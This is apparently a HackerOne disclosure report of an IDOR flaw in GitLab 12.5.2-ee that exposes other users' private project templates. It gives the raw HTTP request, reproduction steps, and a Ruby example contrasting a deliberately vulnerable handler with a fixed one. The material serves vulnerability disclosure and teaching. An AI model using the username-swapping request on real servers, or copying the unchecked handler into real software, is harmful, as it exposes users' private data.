IDOR in getting project template lists of other users
HackerOne report #750636 by ashish_r_padelkar on 2019-12-03, assigned to @dcouture:
Summary
Hello,
When you create a project using a template, there is an Instance tab.
When you click on it, it sends a request like the one below:
GET /users/guest1/available_project_templates HTTP/1.1
Host: mygitserver.in
Accept: */*
X-CSRF-Token: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Referer: http://mygitserver.in/projects/new
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie:1
Connection: close
and you will see the list of project templates available to yourself.
Using this request, you can also see the available (private) templates of other users too, by just changing the username in the request:
GET /users/<Change The UserName>/available_project_templates HTTP/1.1
Steps to reproduce
- Go to create project using the Create from Template option.
- Click on the Instance tab and capture the request shown above.
- Just change the username to admin in the request, e.g.
GET /users/<Change The UserName>/available_project_templates HTTP/1.1
- The response will show you all available templates for admin despite you not having permission to see any of them.
What is the current bug behavior?
Shows available project templates of other users
What is the expected correct behavior?
Only project templates that belong to you should be displayed.
Output of checks
Tested on 12.5.2-ee
Regards,
Ashish
Impact
Users are able to see project templates of other users (IDOR).
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
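The pattern the report describes, as an added illustration that is not GitLab's code or the reporter's: a minimal in-memory model of an "available project templates" lookup. The vulnerable handler trusts the username taken from the URL (/users/:username/available_project_templates) and lists whatever that user can see, so the requester is never compared with the target; the hardened handler only ever answers for the authenticated requester. The data (users, groups, template names) is constructed, and all names (User, Group, templates_for, the two handler functions) are hypothetical.

```ruby
# Added illustration, not GitLab's code. User, Group, GROUPS, USERS and the
# handler functions are hypothetical names chosen for this example.

User  = Struct.new(:username, :group_ids)
Group = Struct.new(:id, :name, :template_names, :private)

# Constructed sample data: one public group and one private group each
# expose custom project templates. "admin" belongs to both, "guest1" to none.
GROUPS = [
  Group.new(1, "public-tools",   ["rails-skeleton"],                  false),
  Group.new(2, "internal-infra", ["k8s-service", "terraform-module"], true),
].freeze

USERS = {
  "admin"  => User.new("admin",  [1, 2]),
  "guest1" => User.new("guest1", []),
}.freeze

# Templates a given user is entitled to see: those of public groups plus
# those of private groups the user is a member of.
def templates_for(user)
  GROUPS.select { |g| !g.private || user.group_ids.include?(g.id) }
        .flat_map(&:template_names)
end

# Vulnerable handler (the IDOR): the target user comes from the URL and only
# the target's entitlements are consulted. current_user is accepted but never
# checked against target_username, so any authenticated user can enumerate
# another user's private templates just by changing the path segment.
def available_project_templates_vulnerable(current_user, target_username)
  target = USERS[target_username]
  return { status: 404, templates: [] } unless target
  { status: 200, templates: templates_for(target) }
end

# Hardened handler: the list is always computed for the authenticated
# requester, and a URL username that does not match the session is treated
# as not found. Answering 404 rather than 403 avoids confirming to the
# requester that the other username exists.
def available_project_templates_fixed(current_user, target_username)
  return { status: 404, templates: [] } unless target_username == current_user.username
  { status: 200, templates: templates_for(current_user) }
end

if __FILE__ == $PROGRAM_NAME
  guest = USERS["guest1"]
  puts "vulnerable, guest1 -> admin: #{available_project_templates_vulnerable(guest, 'admin')}"
  puts "fixed,      guest1 -> admin: #{available_project_templates_fixed(guest, 'admin')}"
  puts "fixed,      guest1 -> self:  #{available_project_templates_fixed(guest, 'guest1')}"
end
```

Run as a script: with the constructed data, guest1 asking the vulnerable handler for admin receives all three template names including the two from the private group, while the hardened handler returns 404 for that request and only the public template when guest1 asks for their own list. The same check applies to any per-user resource reachable by username or numeric id in the path: the owner must be derived from the session, or the path value must be compared against it, before anything is listed.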
